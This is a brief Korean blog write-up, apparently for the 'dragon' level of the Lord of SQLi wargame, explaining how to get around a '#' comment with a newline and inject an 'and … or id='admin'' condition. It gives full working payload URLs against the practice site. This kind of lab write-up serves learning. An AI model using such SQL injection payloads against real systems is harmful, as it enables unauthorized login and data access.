반응형
분석
이번 문제는 드래곤
pw만 받을 수 있는데.. query 문에서부터 뒤를 주석처리 해버립니다.
id가 admin이 되면 풀 수 있는 문제인데.. 주석처리를 어떻게 무효화 시키는지를 찾아야 할 것 같습니다.
# 주석의 특징으로는 한 줄 주석이라는건데..
개행을 넣으면 혹시 다르지 않을까요
https://los.rubiya.kr/chall/dragon_51996aa769df79afbf79eb4d66dbcef6.php?pw=%27%0a%20or%20id=%27admin%27%20%23
안됩니다. 그 이유로 생각되는건 guest 아이디가 먼저 선택되었기 때문..
그러면 앞 조건을 틀리게 하고 or을 넣으면..?
풀이
https://los.rubiya.kr/chall/dragon_51996aa769df79afbf79eb4d66dbcef6.php?pw=%27%20%0a%20and%20pw=%27%27%20or%20%20id=%27admin
개행을 넣어서 주석을 우회하려고 했으나 그러면 id='guest' or id='admin' 식이라서 앞 guest에 걸리기에 안 됩니다.
그래서 and 조건으로 pw를 달아서 앞 조건을 무효화하고 뒤 admin만 가능하도록 합니다.
반응형
